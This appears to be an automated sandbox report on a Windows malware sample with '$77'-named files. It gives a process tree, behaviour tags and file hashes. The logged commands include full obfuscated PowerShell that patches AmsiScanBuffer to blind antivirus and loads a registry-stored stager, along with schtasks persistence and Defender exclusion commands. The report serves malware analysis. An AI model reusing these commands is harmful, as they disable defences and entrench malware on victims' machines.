111 PID 3356 wrote to memory of 592 3356 dllhost.exe 3 PID 3356 wrote to memory of 676 3356 dllhost.exe 1 PID 3356 wrote to memory of 952 3356 dllhost.exe 23 PID 3356 wrote to memory of 332 3356 dllhost.exe 11
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:592
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:332
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a21aff78-d8a4-482d-ad94-3f80eabeb177}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{584339b2-d48e-479b-aedf-d04e62003a81}2⤵PID:3616
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{584339b2-d48e-479b-aedf-d04e62003a81}2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1140 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:sWNMGeeqxCew{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FLSGNEYIuzMFhJ,[Parameter(Position=1)][Type]$kiGHAznbqu)$DIOjjNYMmVl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$DIOjjNYMmVl.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$FLSGNEYIuzMFhJ).SetImplementationFlags('Runtime,Managed');$DIOjjNYMmVl.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$kiGHAznbqu,$FLSGNEYIuzMFhJ).SetImplementationFlags('Runtime,Managed');Write-Output $DIOjjNYMmVl.CreateType();}$xiKjxKMdFrVWi=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$xvEURQKfUvRsOZ=$xiKjxKMdFrVWi.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kRdHuFwzpJrbqTITYLq=sWNMGeeqxCew @([String])([IntPtr]);$RlZrSvAWKtMSzptyefdXge=sWNMGeeqxCew @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lYBgMxVEizx=$xiKjxKMdFrVWi.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$iKmSCJLEDdvGrs=$xvEURQKfUvRsOZ.Invoke($Null,@([Object]$lYBgMxVEizx,[Object]('Load'+'LibraryA')));$FdiJtVUqegjunzHmZ=$xvEURQKfUvRsOZ.Invoke($Null,@([Object]$lYBgMxVEizx,[Object]('Vir'+'tual'+'Pro'+'tect')));$smSsLJd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($iKmSCJLEDdvGrs,$kRdHuFwzpJrbqTITYLq).Invoke('a'+'m'+'si.dll');$hKEbHYWmtcumGqDHV=$xvEURQKfUvRsOZ.Invoke($Null,@([Object]$smSsLJd,[Object]('Ams'+'iSc'+'an'+'Buffer')));$qiYZlAeIto=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FdiJtVUqegjunzHmZ,$RlZrSvAWKtMSzptyefdXge).Invoke($hKEbHYWmtcumGqDHV,[uint32]8,4,[ref]$qiYZlAeIto);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$hKEbHYWmtcumGqDHV,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FdiJtVUqegjunzHmZ,$RlZrSvAWKtMSzptyefdXge).Invoke($hKEbHYWmtcumGqDHV,[uint32]8,0x20,[ref]$qiYZlAeIto);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1824
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:iMzXCQwJjflk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UAhIvVXBoynSBP,[Parameter(Position=1)][Type]$TcodXjoMtZ)$vjNebDlRByj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$vjNebDlRByj.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$UAhIvVXBoynSBP).SetImplementationFlags('Runtime,Managed');$vjNebDlRByj.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$TcodXjoMtZ,$UAhIvVXBoynSBP).SetImplementationFlags('Runtime,Managed');Write-Output $vjNebDlRByj.CreateType();}$SOLEIKFQZXgwM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$MElQLZKbqvseXf=$SOLEIKFQZXgwM.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bZRCETSSixQSxuhIYAS=iMzXCQwJjflk @([String])([IntPtr]);$vYhXwZNtzAbneOwUOxJaqO=iMzXCQwJjflk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$STHpTQwLTtx=$SOLEIKFQZXgwM.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EgplVwdjjlhhRv=$MElQLZKbqvseXf.Invoke($Null,@([Object]$STHpTQwLTtx,[Object]('Load'+'LibraryA')));$gaBnDzHwGeirGKgRz=$MElQLZKbqvseXf.Invoke($Null,@([Object]$STHpTQwLTtx,[Object]('Vir'+'tual'+'Pro'+'tect')));$xiMcSoR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EgplVwdjjlhhRv,$bZRCETSSixQSxuhIYAS).Invoke('a'+'m'+'si.dll');$qbbeLlIKyRmGLYkjg=$MElQLZKbqvseXf.Invoke($Null,@([Object]$xiMcSoR,[Object]('Ams'+'iSc'+'an'+'Buffer')));$gzGhcLYPUy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaBnDzHwGeirGKgRz,$vYhXwZNtzAbneOwUOxJaqO).Invoke($qbbeLlIKyRmGLYkjg,[uint32]8,4,[ref]$gzGhcLYPUy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qbbeLlIKyRmGLYkjg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaBnDzHwGeirGKgRz,$vYhXwZNtzAbneOwUOxJaqO).Invoke($qbbeLlIKyRmGLYkjg,[uint32]8,0x20,[ref]$gzGhcLYPUy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3752
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1324
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2332
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3144
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3500
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4480
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4480 -s 3562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2168
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:4488
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4656
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:4144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:4296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4988
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3836
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3340
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3340 -s 9002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3096
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"{path}"3⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"'5⤵
- Creates scheduled task(s)
PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp95A8.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3784
-
-
C:\Users\Admin\AppData\Roaming\$77-update.exe"C:\Users\Admin\AppData\Roaming\$77-update.exe"5⤵
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Users\Admin\AppData\Roaming\$77-update.exe"{path}"6⤵
- Executes dropped EXE
PID:5012
-
-
C:\Users\Admin\AppData\Roaming\$77-update.exe"{path}"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension @('exe','dll') -Force7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"'8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"9⤵
- Executes dropped EXE
PID:3180
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"' & exit7⤵PID:3792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:3464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"'8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:2896
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"' & exit7⤵PID:400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:1096
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"'8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"9⤵
- Executes dropped EXE
- Drops startup file
PID:4288
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"' & exit7⤵PID:1448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:4844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"'8⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"9⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4484 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$77Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe" /rl HIGHEST /f10⤵
- Creates scheduled task(s)
PID:832 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:4700
-
-
-
C:\Windows\system32\$77win\$77Client.exe"C:\Windows\system32\$77win\$77Client.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4880 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$77Client" /sc ONLOGON /tr "C:\Windows\system32\$77win\$77Client.exe" /rl HIGHEST /f11⤵
- Creates scheduled task(s)
PID:2164 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:2040
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2656
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2204
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:4012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3156
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2916 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 3340 -ip 33402⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4792
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 4480 -ip 44802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4780
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40KB
MD50ecb371d3ed303b183b2b69c8d9ef347
SHA133f729b51db9c3ea13629c914e3e849b4ddf95fa
SHA256927de09ad8030ef31d08fdd25b20b161d7d0e9b1815686309b1996d9aac960e0
SHA512047452a15b084c6a7d44e46f7df0b9b150fd0daecff8212ec44b5bf494ba81ae2966825221752858801aa50d1046c85eaee3811d09d5b8b334176a103d46be53
-
Filesize
13KB
MD556fa2a0873c5fdcf487a96cf49b2c517
SHA1342e500f59664459da86fa15aea585ee3ea28f38
SHA256e4f1a0187db1dd9d3f7a0a31812a05b191554f89a35bc28e477e4909513f776f
SHA512f9b19372cec8d2878e30b06f5a1511b7c0e7836f6091521985e8bec3c04f7f58dc98e4615ce19fcd8051a64c3b4e4b25232903eb54369b2374b43bd0566cf68a
-
Filesize
40KB
MD5d92fe8cae2a0faba8c6cb3240b2f4539
SHA1a7f96f6237b009ed1a46a996ca7b63c94629bcb6
SHA256aec96c93ad9bea169f297ac4ddf7d39be3b30d056226c358c98a3bcbf9892512
SHA5128cb53d2541f2582c3968302df3fe1b56b17a0656de6b51b3c538fc9a2c4f587b90eb10bedf747b15ff0fb0b86e74741746744bd90a9193ae37ac704e0490b351
-
Filesize
13KB
MD5310b3a6511d34a9302da2d30eac9d951
SHA1fed474709b8aa3f97663387f8242ebcc684ab6aa
SHA256c78863eb2d055ccb8331eb67f79525a3f2bf7f9bb4f09d4114c7a88c4228e047
SHA512b7f7cae4ae5d6f792efa7747bb093b6415d2de0b4efe22baaf9bb64ef7b9e8241c6fde7a437dbe62ff2dbad83cd6803bd13fda0a2fa54b67fea76b41fbeb876e
-
Filesize
1KB
MD53aea5c16a0e7b995983bd1771d5ea11d
SHA15ce845c82ace7946cec271a8bac45572b977419c
SHA2568d7143472e7cf3a40f46c6346251661e10fe3a932321cff14190648ee3d9c02f
SHA5124d0949cc3c0b7bc19b94a7166fb1a528c5833773b4b577f1730c4aab93ec03f3d72714ebf8a103f2a6ab4f97abef2945e78c91d464885fb4f1f9c584d7a1b243
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe.log
Filesize1KB
MD53aea5c16a0e7b995983bd1771d5ea11d
SHA15ce845c82ace7946cec271a8bac45572b977419c
SHA2568d7143472e7cf3a40f46c6346251661e10fe3a932321cff14190648ee3d9c02f
SHA5124d0949cc3c0b7bc19b94a7166fb1a528c5833773b4b577f1730c4aab93ec03f3d72714ebf8a103f2a6ab4f97abef2945e78c91d464885fb4f1f9c584d7a1b243
-
Filesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
Filesize
18KB
MD5178b163e9b67d012f54106f7a760748b
SHA1590651a8d9f593a134a978e68ed5fdd6f1ebd448
SHA256471293350ed9c41d8d3677db8d466d08194b25258a7b225164bea0bdf8e1ea7e
SHA512f2d0db45f41490f2862db80304acc28d2be630e81bff31e5b69589d09d4ffc802195b5401e1d1caf4db8a3c271ebe613c9411c06bcf7ae3579fe29c614e05d93
-
Filesize
15KB
MD539721085378b5318f4f5fa94f7a78b5d
SHA101063e8b4dae81935fae2ff0065b26c8ce85c75f
SHA256858b1485a2f323ebecbec6cafc95cc64f0a8aa9af0eadfb766494af959b8290b
SHA512f846d43b5209c2690f03cc04fe7fbd55eed64229e9c9548fc70d918c3bc62bc3cd46d0a8ae463727e877b3ebd9421770477829d7adab3a4a8735577bf518c5a1
-
Filesize
15KB
MD539721085378b5318f4f5fa94f7a78b5d
SHA101063e8b4dae81935fae2ff0065b26c8ce85c75f
SHA256858b1485a2f323ebecbec6cafc95cc64f0a8aa9af0eadfb766494af959b8290b
SHA512f846d43b5209c2690f03cc04fe7fbd55eed64229e9c9548fc70d918c3bc62bc3cd46d0a8ae463727e877b3ebd9421770477829d7adab3a4a8735577bf518c5a1
-
Filesize
15KB
MD5ef2069360532090889f5be92e0aa658b
SHA1087e5dcef20d558d8049af7ba712f603706b4c20
SHA2564c1ee4e2c2806d8ac045542320bad324a5ed51e328982bac40688c8309f7df6a
SHA512ea16ada7d5bd123362bea666fddd8aa4906ac377c7c8ee5302ca8616c62f8721d1b800f72b889c981aee1d7ea75ee107bc71ab80d1b4cf8f305db9719993c3d1
-
Filesize
15KB
MD5add3e8f475f9bb2e592125a4e45d19cb
SHA1161e4b0d02f64e741de9c26f8414c6c49aeaff44
SHA256b419a999730e764e89b6d3d22d28274d68d9fe1c5515b404a5b974c8b3f3c06a
SHA51243d81f738c19d8f937d17be07c4d4f8d802e87b96ea8f15d0fd4224c5e5f823bf7772c5d54f9d37fcc0f92c8573f4dd542105e397abb16cc918f24d22c65b6f2
-
Filesize
502KB
